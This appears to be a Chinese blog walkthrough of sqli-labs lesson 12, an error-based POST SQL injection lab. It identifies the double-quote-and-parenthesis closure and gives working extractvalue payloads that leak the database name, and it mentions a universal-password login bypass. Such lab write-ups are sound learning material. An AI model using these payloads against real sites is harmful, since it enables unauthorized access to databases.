sqli-labs通关-------12lesson-post(基于错误的双引号变形)

首先我们查看万能密码变形(对第一个1进行各种引号括号变形)当发现使用双引号进行闭合时发现如下错

sqli-labs通关-------12lesson-post(基于错误的双引号变形)_第1张图片

对于上面的报错 首先怀疑 where username = “usernmae” and password = “ps”

那本地数据库对语句进行演练。

sqli-labs通关-------12lesson-post(基于错误的双引号变形)_第2张图片

 

好了那我们尝试构造一下上面的语句吧。

我们进行了如下构造

uname=1") and  extractvalue(1,concat(0x7e,(select database())))  #&passwd=&submit=Submit

sqli-labs通关-------12lesson-post(基于错误的双引号变形)_第3张图片

结果如下:

sqli-labs通关-------12lesson-post(基于错误的双引号变形)_第4张图片

 看别人的博客也可以这样构造:

admin"  and extractvalue(1,concat(0x7e,(select database())))  and " 

sqli-labs通关-------12lesson-post(基于错误的双引号变形)_第5张图片

结果也是ok的。

还有就是万能密码也是可以的

sqli-labs通关-------12lesson-post(基于错误的双引号变形)_第6张图片

你可能感兴趣的:(安全,sql注入学习总结)